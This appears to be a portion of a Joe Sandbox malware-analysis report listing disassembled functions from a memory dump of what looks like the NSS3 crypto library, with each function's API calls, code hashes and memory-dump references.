Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: f577dc1f1a88bbd98ac76c9f6af9dc0438389d98978b56f4cd2c17e2d8a54c96
Instruction ID: c06ebc7f2b650ab2c31ea66d81da2efdb24dc95c86f0270e08e1d97f54c7c3c9
Opcode Fuzzy Hash: f577dc1f1a88bbd98ac76c9f6af9dc0438389d98978b56f4cd2c17e2d8a54c96
Instruction Fuzzy Hash: C501F93294816069D310CB7A5D84D937FACDF8631574B01C9FA446F3B3E612D902C7E9

Function 6C507F90 Relevance: 6.2, APIs: 4, Instructions: 223COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5081DF
LeaveCriticalSection.KERNEL32(?), ref: 6C508239
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C508255
sqlite3_free.NSS3(00000000), ref: 6C508260

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavememcpysqlite3_free
String ID:
API String ID: 1525636458-0
Opcode ID: 668e43c086dc4e722bbddfdc1609c20e892d788f58f6c0869ed6983994fa570b
Instruction ID: 7599608df388ab9115258ef1247b9cd6c4bea71524a2db1001f1a70260e94545
Opcode Fuzzy Hash: 668e43c086dc4e722bbddfdc1609c20e892d788f58f6c0869ed6983994fa570b
Instruction Fuzzy Hash: E391AC71B01608CBEF04DFE2DC99BADB7B1BF06304F24402AD41ADB650DB796A55CB86

Function 6C5E1D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C5E1D8F

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C5E1DA6

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C5E1E13
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5E1ED0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
String ID:
API String ID: 84796498-0
Opcode ID: 0c796584f73e1837d312cf43ea5b1d13730b9aaf2c4a0a1ec3b1f3f611f2a10c
Instruction ID: eef05a66bf3e589a940f0b152f5be47bc7cf7a60efeeef9b48ae7580488d39e4
Opcode Fuzzy Hash: 0c796584f73e1837d312cf43ea5b1d13730b9aaf2c4a0a1ec3b1f3f611f2a10c
Instruction Fuzzy Hash: 13515775A00309DFDB00CF98CC84BAEBBB6BF89318F144529E8199B752D771E945CB90

Function 6C634FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C5185D2,00000000,?,?), ref: 6C634FFD
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C63500C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6350C8
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6350D6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction ID: 2ccc928961c0b5a738a383bb9a4b72fee745194ac36a39e815b0bd621cb38709
Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
Instruction Fuzzy Hash: 13418EB6A002118BCB18CF18DCD179AB7E1BF4531871D566DD84ECBB02E37AE891CB95

Function 6C55FFA0 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3(00000000,?,?,?,6C55FDFE), ref: 6C55FFAD

Part of subcall function 6C4FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C55F9C9,?,6C55F4DA,6C55F9C9,?,?,6C52369A), ref: 6C4FCA7A
Part of subcall function 6C4FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4FCB26

memset.VCRUNTIME140(00000000,00000000,00000008,00000000,?,?,?,6C55FDFE), ref: 6C55FFDF
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,?,?,6C55FDFE), ref: 6C56001C
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,6C55FDFE), ref: 6C56006F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memsetsqlite3_initialize
String ID:
API String ID: 2358433136-0
Opcode ID: ecc03a3713b3f1362a3ebe403d03c264190c46ebc096f71afa3472f9eb000d14
Instruction ID: f51f504f4e4e90774e5c170a730543e685b65b84def84070dd9089a4904ab74b
Opcode Fuzzy Hash: ecc03a3713b3f1362a3ebe403d03c264190c46ebc096f71afa3472f9eb000d14
Instruction Fuzzy Hash: D841ED71B012159BDB08DFA6DCC5ABE7770FF86324F04002AD80693B11DB79AA11CBE9

Function 6C68A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C68A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C68A662), ref: 6C68A69E
Part of subcall function 6C68A690: PR_NewCondVar.NSS3(?), ref: 6C68A6B4

PR_IntervalNow.NSS3 ref: 6C68A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C68A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C68A944
PR_SetPollableEvent.NSS3(?), ref: 6C68A94F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 08c15c4fb38056d4c94b8c679fe34dd4ddfd0162242e88dc52cd712275ff122d
Instruction ID: f68b6ccf646c8c64096ae0b15a18237a5f3e35815b1d7a6cda177d35141eff12
Opcode Fuzzy Hash: 08c15c4fb38056d4c94b8c679fe34dd4ddfd0162242e88dc52cd712275ff122d
Instruction Fuzzy Hash: 124159B4A06A02DFCB04CF29C580956FBF1FF48318714952AD959CBB52E731E850CFA4

Function 6C647DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C647E10
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C647EA6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C647EB5
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C647ED8

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _byteswap_ulong
String ID:
API String ID: 4101233201-0
Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction ID: 4f5f0b193c4dbf874b2a2ba12f652c10dd8605bbb664498ef874fefd4ca360da
Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
Instruction Fuzzy Hash: EF31B5B1A011118FDB04CF08D89099ABBE2FF8931871BC669C8585BB11EB71EC46CBD5

Function 6C5FDF00 Relevance: 6.1, APIs: 4, Instructions: 106COMMON

Download Yara Rule

APIs

Part of subcall function 6C583090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C59AE42), ref: 6C5830AA
Part of subcall function 6C583090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5830C7
Part of subcall function 6C583090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5830E5
Part of subcall function 6C583090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C583116
Part of subcall function 6C583090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C58312B
Part of subcall function 6C583090: PK11_DestroyObject.NSS3(?,?), ref: 6C583154
Part of subcall function 6C583090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C58317E

SECKEY_CopyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C5FDBBD), ref: 6C5FDFCF
SECKEY_DestroyPrivateKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5FDFEE

Part of subcall function 6C5986D0: PK11_Authenticate.NSS3(?,00000001,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C598716
Part of subcall function 6C5986D0: TlsGetValue.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C598727
Part of subcall function 6C5986D0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C59873B
Part of subcall function 6C5986D0: PR_Unlock.NSS3(?), ref: 6C59876F
Part of subcall function 6C5986D0: PR_SetError.NSS3(00000000,00000000), ref: 6C598787

Part of subcall function 6C5BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C5BF854
Part of subcall function 6C5BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C5BF868
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C5BF882
Part of subcall function 6C5BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C5BF889
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C5BF8A4
Part of subcall function 6C5BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C5BF8AB
Part of subcall function 6C5BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C5BF8C9
Part of subcall function 6C5BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C5BF8D0

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,6C5FDBBD), ref: 6C5FDFFC
PR_SetError.NSS3(FFFFE013,00000000,?,?,6C5FDBBD), ref: 6C5FE007

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Utilfree$CriticalSection$DeleteDestroy$Arena_CopyErrorK11_Private$AlgorithmAlloc_ArenaAuthenticateEnterFreeItem_ObjectPublicTag_UnlockValuememset
String ID:
API String ID: 3730430729-0
Opcode ID: c604a428c650b578d6276f5b0a9e4696917450eb01bfd20490465afd6e40568a
Instruction ID: 436fa8a9c1393dd3d6f35fd8a878785f9d770214a207adcd7c1025bea06a49c3
Opcode Fuzzy Hash: c604a428c650b578d6276f5b0a9e4696917450eb01bfd20490465afd6e40568a
Instruction Fuzzy Hash: 6F3107B0B0520197E704AE79ACC5E9B77B89F9530CF040135E91AD7B12FB35D919C6E2

Function 6C576C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C576C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C576CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C576CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C698FE0), ref: 6C576CFE

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 822f3bf0e1017344238f83dfba94a123af8b65d55f661ecc9cd5eef80b6f6318
Instruction ID: 95c3e251a029497b2047f0073e7361a9cd0dbfbef55a7afeda2029abfc6a9979
Opcode Fuzzy Hash: 822f3bf0e1017344238f83dfba94a123af8b65d55f661ecc9cd5eef80b6f6318
Instruction Fuzzy Hash: C431A0B1A002169FDB18DF65CC81ABFBBF9EF89248B10442DD905E7700EB319945CBB0

Function 6C684F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C684F5D
free.MOZGLUE(?), ref: 6C684F74
free.MOZGLUE(?), ref: 6C684F82
GetLastError.KERNEL32 ref: 6C684F90

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: 45f296ed6161a262ecc517f6446cb6ac20c530aadf8397edf5a3ef8a5074f085
Instruction ID: a1b1c60d214c2c44795b4d2956e856d618541cca4bb588007f97dedcc02256ce
Opcode Fuzzy Hash: 45f296ed6161a262ecc517f6446cb6ac20c530aadf8397edf5a3ef8a5074f085
Instruction Fuzzy Hash: 7A3137B5A012195BEB01CB69DC91BEAB3BCFF85348F050229E815A7680DB74A90586A9

Function 6C5CDDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6C5CDDB1,?,00000000), ref: 6C5CDDF4

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6C5CDDB1,?,00000000), ref: 6C5CDE0B
PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6C5CDDB1,?,00000000), ref: 6C5CDE17

Part of subcall function 6C5D0BE0: malloc.MOZGLUE(6C5C8D2D,?,00000000,?), ref: 6C5D0BF8
Part of subcall function 6C5D0BE0: TlsGetValue.KERNEL32(6C5C8D2D,?,00000000,?), ref: 6C5D0C15

PR_SetError.NSS3(FFFFE009,00000000), ref: 6C5CDE80

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaValue$CriticalEnterErrorMark_SectionUnlockmalloc
String ID:
API String ID: 3725328900-0
Opcode ID: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction ID: 157428a5b27a27b9443b65a5749b0f311fc35adce799b23a6cda0136e4d906bc
Opcode Fuzzy Hash: 76bed5ec1ed1856720d9d5efe1139b27b0a87fc8713e0c3613628c4c4c5f84ea
Instruction Fuzzy Hash: 8E31A7B1A417429BE700CF9ADC80656F7E4BFE5318B24862ED819C7B01E7B0F5A4CB91

Function 6C5BFE20 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C595ADC,?,00000000,00000001,?,?,00000000,?,6C58BA55,?,?), ref: 6C5BFE4B
EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5BFE5F
PR_Unlock.NSS3(78831D74), ref: 6C5BFEC2
PR_SetError.NSS3(00000000,00000000), ref: 6C5BFED6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: b0bd6270485fd4cdb65e01a77aef83729c0072bd4074abf07b596f14a78b7c44
Instruction ID: dafa60a65caa0c6af37699dceabcce8879187cc68e9b891928568806b45f1d79
Opcode Fuzzy Hash: b0bd6270485fd4cdb65e01a77aef83729c0072bd4074abf07b596f14a78b7c44
Instruction Fuzzy Hash: A9210139E00625ABD7809F69DCA47AABBB4FF05358F040224FD0567E42E730E968CBD5

Function 6C5C3F50 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6C5C3440: PK11_GetAllTokens.NSS3 ref: 6C5C3481
Part of subcall function 6C5C3440: PR_SetError.NSS3(00000000,00000000), ref: 6C5C34A3
Part of subcall function 6C5C3440: TlsGetValue.KERNEL32 ref: 6C5C352E
Part of subcall function 6C5C3440: EnterCriticalSection.KERNEL32(?), ref: 6C5C3542
Part of subcall function 6C5C3440: PR_Unlock.NSS3(?), ref: 6C5C355B

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C5AE80C,00000000,00000000,?,?,?,?,6C5B8C5B,-00000001), ref: 6C5C3FA1
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C5AE80C,00000000,00000000,?,?,?,?,6C5B8C5B,-00000001), ref: 6C5C3FBA
PR_Unlock.NSS3(?,00000000,00000000,00000000,?,6C5AE80C,00000000,00000000,?,?,?,?,6C5B8C5B,-00000001), ref: 6C5C3FFE
PR_SetError.NSS3 ref: 6C5C401A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$K11_Tokens
String ID:
API String ID: 3021504977-0
Opcode ID: 50c26594a35e5b2a826b9a5ad6dd1a94fdca4bad40929d08dec50cbdb6fa68ff
Instruction ID: 9f8aea05ae66af32a9fb8b5dd9207a0c712885e7e89a7462ac3008e95605e9c7
Opcode Fuzzy Hash: 50c26594a35e5b2a826b9a5ad6dd1a94fdca4bad40929d08dec50cbdb6fa68ff
Instruction Fuzzy Hash: 40315E74A04604CFD710EFA9D9846AABBF0FF85314F01592DD8899BB10EB34E984CB96

Function 6C5B4FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C5BB60F,00000000), ref: 6C5B5003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C5BB60F,00000000), ref: 6C5B501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C5BB60F,00000000), ref: 6C5B504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C5BB60F,00000000), ref: 6C5B5064

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
